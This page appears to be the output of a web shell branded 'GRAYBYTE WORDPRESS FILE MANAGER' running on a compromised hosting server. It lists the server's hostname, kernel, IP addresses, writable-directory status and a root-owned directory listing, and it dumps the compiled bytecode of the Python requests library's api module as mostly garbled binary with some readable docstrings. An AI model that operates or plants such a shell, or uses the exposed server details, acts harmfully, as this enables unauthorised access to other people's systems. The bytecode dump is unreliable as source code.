✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server366.web-hosting.com ​🇻​♯➤ 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 67.223.118.204 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.217.62
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /opt/hc_python/lib/python3.12/site-packages/requests/__pycache__//api.cpython-312.pyc
�

�@*j�����dZddlmZddlmZddlmZddlmZerddl	m
Z
ddlmZ								dd	�Z
	d							dd�Zdd�Zdd
�Z		d									dd�Z	d							dd�Z	d							dd�Zdd�Zy
)z�
requests.api
~~~~~~~~~~~~

This module implements the Requests API.

:copyright: (c) 2012 by Kenneth Reitz.
:license: Apache2, see LICENSE for more details.
�)�annotations)�
TYPE_CHECKING�)�sessions)�Response)�Unpack)�_typesc��tj�5}|jd||d�|��cddd�S#1swYyxYw)a�	Constructs and sends a :class:`Request <Request>`.

    :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``.
    :param url: URL for the new :class:`Request` object.
    :param params: (optional) Dictionary, list of tuples or bytes to send
        in the query string for the :class:`Request`.
    :param data: (optional) Dictionary, list of tuples, bytes, or file-like
        object to send in the body of the :class:`Request`.
    :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`.
    :param headers: (optional) Dictionary of HTTP Headers to send with the :class:`Request`.
    :param cookies: (optional) Dict or CookieJar object to send with the :class:`Request`.
    :param files: (optional) Dictionary of ``'name': file-like-objects`` (or ``{'name': file-tuple}``) for multipart encoding upload.
        ``file-tuple`` can be a 2-tuple ``('filename', fileobj)``, 3-tuple ``('filename', fileobj, 'content_type')``
        or a 4-tuple ``('filename', fileobj, 'content_type', custom_headers)``, where ``'content_type'`` is a string
        defining the content type of the given file and ``custom_headers`` a dict-like object containing additional headers
        to add for the file.
    :param auth: (optional) Auth tuple to enable Basic/Digest/Custom HTTP Auth.
    :param timeout: (optional) How many seconds to wait for the server to send data
        before giving up, as a float, or a :ref:`(connect timeout, read
        timeout) <timeouts>` tuple.
    :type timeout: float or tuple
    :param allow_redirects: (optional) Boolean. Enable/disable GET/OPTIONS/POST/PUT/PATCH/DELETE/HEAD redirection. Defaults to ``True``.
    :type allow_redirects: bool
    :param proxies: (optional) Dictionary mapping protocol to the URL of the proxy.
    :param verify: (optional) Either a boolean, in which case it controls whether we verify
            the server's TLS certificate, or a string, in which case it must be a path
            to a CA bundle to use. Defaults to ``True``.
    :param stream: (optional) if ``False``, the response content will be immediately downloaded.
    :param cert: (optional) if String, path to ssl client cert file (.pem). If Tuple, ('cert', 'key') pair.
    :return: :class:`Response <Response>` object
    :rtype: requests.Response

    Usage::

      >>> import requests
      >>> req = requests.request('GET', 'https://httpbin.org/get')
      >>> req
      <Response [200]>
    )�method�urlN�)r�Session�request)rr�kwargs�sessions    �;/opt/hc_python/lib/python3.12/site-packages/requests/api.pyrrs7��\
�	�	�	�w��w���@�f�#�@��@�
�	�	�s�4�=Nc� �td|fd|i|��S)adSends a GET request.

    :param url: URL for the new :class:`Request` object.
    :param params: (optional) Dictionary, list of tuples or bytes to send
        in the query string for the :class:`Request`.
    :param \*\*kwargs: Optional arguments that ``request`` takes.
    :return: :class:`Response <Response>` object
    :rtype: requests.Response
    �get�params�r)rrrs   rrrJs���5�#�7�f�7��7�7�c��td|fi|��S)z�Sends an OPTIONS request.

    :param url: URL for the new :class:`Request` object.
    :param \*\*kwargs: Optional arguments that ``request`` takes.
    :return: :class:`Response <Response>` object
    :rtype: requests.Response
    �optionsr�rrs  rrrZs���9�c�,�V�,�,rc�@�|jdd�td|fi|��S)akSends a HEAD request.

    :param url: URL for the new :class:`Request` object.
    :param \*\*kwargs: Optional arguments that ``request`` takes. If
        `allow_redirects` is not provided, it will be set to `False` (as
        opposed to the default :meth:`request` behavior).
    :return: :class:`Response <Response>` object
    :rtype: requests.Response
    �allow_redirectsF�head)�
setdefaultrrs  rrrfs'�����'��/��6�3�)�&�)�)rc�"�td|f||d�|��S)a�Sends a POST request.

    :param url: URL for the new :class:`Request` object.
    :param data: (optional) Dictionary, list of tuples, bytes, or file-like
        object to send in the body of the :class:`Request`.
    :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`.
    :param \*\*kwargs: Optional arguments that ``request`` takes.
    :return: :class:`Response <Response>` object
    :rtype: requests.Response
    �post)�data�jsonr)rr!r"rs    rr r us��"�6�3�?�T��?��?�?rc� �td|fd|i|��S)a�Sends a PUT request.

    :param url: URL for the new :class:`Request` object.
    :param data: (optional) Dictionary, list of tuples, bytes, or file-like
        object to send in the body of the :class:`Request`.
    :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`.
    :param \*\*kwargs: Optional arguments that ``request`` takes.
    :return: :class:`Response <Response>` object
    :rtype: requests.Response
    �putr!r�rr!rs   rr$r$�s���5�#�3�D�3�F�3�3rc� �td|fd|i|��S)a�Sends a PATCH request.

    :param url: URL for the new :class:`Request` object.
    :param data: (optional) Dictionary, list of tuples, bytes, or file-like
        object to send in the body of the :class:`Request`.
    :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`.
    :param \*\*kwargs: Optional arguments that ``request`` takes.
    :return: :class:`Response <Response>` object
    :rtype: requests.Response
    �patchr!rr%s   rr'r'�s���7�C�5�d�5�f�5�5rc��td|fi|��S)z�Sends a DELETE request.

    :param url: URL for the new :class:`Request` object.
    :param \*\*kwargs: Optional arguments that ``request`` takes.
    :return: :class:`Response <Response>` object
    :rtype: requests.Response
    �deleterrs  rr)r)�s���8�S�+�F�+�+r)r�strr�
_t.UriTyper�Unpack[_t.RequestKwargs]�returnr)N)rr+rz
_t.ParamsTyperzUnpack[_t.GetKwargs]r-r)rr+rr,r-r)NN)
rr+r!�_t.DataTyper"z_t.JsonTyperzUnpack[_t.PostKwargs]r-r)rr+r!r.rzUnpack[_t.DataKwargs]r-r)�__doc__�
__future__r�typingr�r�modelsr�typing_extensionsrr	�_trrrrr r$r'r)r
rr�<module>r6s���#� ����(��/A��/A� �/A�,D�/A�
�/A�f.2�
8�	�
8�*�
8�=Q�
8�
�
8� 	-�*�"��@�	�@�
�@��@�$�	@�
�@�**.�4�	�4�&�4�9N�4�
�4�$*.�6�	�6�&�6�9N�6�
�6�"	,r


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
11 Jun 2026 5.00 AM
root / root
0755
__init__.cpython-312.pyc
5.616 KB
11 Jun 2026 5.00 AM
root / root
0644
__version__.cpython-312.pyc
0.541 KB
11 Jun 2026 5.00 AM
root / root
0644
_internal_utils.cpython-312.pyc
2.049 KB
11 Jun 2026 5.00 AM
root / root
0644
_types.cpython-312.pyc
7.066 KB
11 Jun 2026 5.00 AM
root / root
0644
adapters.cpython-312.pyc
28.898 KB
11 Jun 2026 5.00 AM
root / root
0644
api.cpython-312.pyc
7.828 KB
11 Jun 2026 5.00 AM
root / root
0644
auth.cpython-312.pyc
15.387 KB
11 Jun 2026 5.00 AM
root / root
0644
certs.cpython-312.pyc
0.621 KB
11 Jun 2026 5.00 AM
root / root
0644
compat.cpython-312.pyc
2.406 KB
11 Jun 2026 5.00 AM
root / root
0644
cookies.cpython-312.pyc
27.671 KB
11 Jun 2026 5.00 AM
root / root
0644
exceptions.cpython-312.pyc
7.736 KB
11 Jun 2026 5.00 AM
root / root
0644
help.cpython-312.pyc
4.188 KB
11 Jun 2026 5.00 AM
root / root
0644
hooks.cpython-312.pyc
1.519 KB
11 Jun 2026 5.00 AM
root / root
0644
models.cpython-312.pyc
40.898 KB
11 Jun 2026 5.00 AM
root / root
0644
packages.cpython-312.pyc
1.063 KB
11 Jun 2026 5.00 AM
root / root
0644
sessions.cpython-312.pyc
31.131 KB
11 Jun 2026 5.00 AM
root / root
0644
status_codes.cpython-312.pyc
5.967 KB
11 Jun 2026 5.00 AM
root / root
0644
structures.cpython-312.pyc
7.085 KB
11 Jun 2026 5.00 AM
root / root
0644
utils.cpython-312.pyc
39.062 KB
11 Jun 2026 5.00 AM
root / root
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF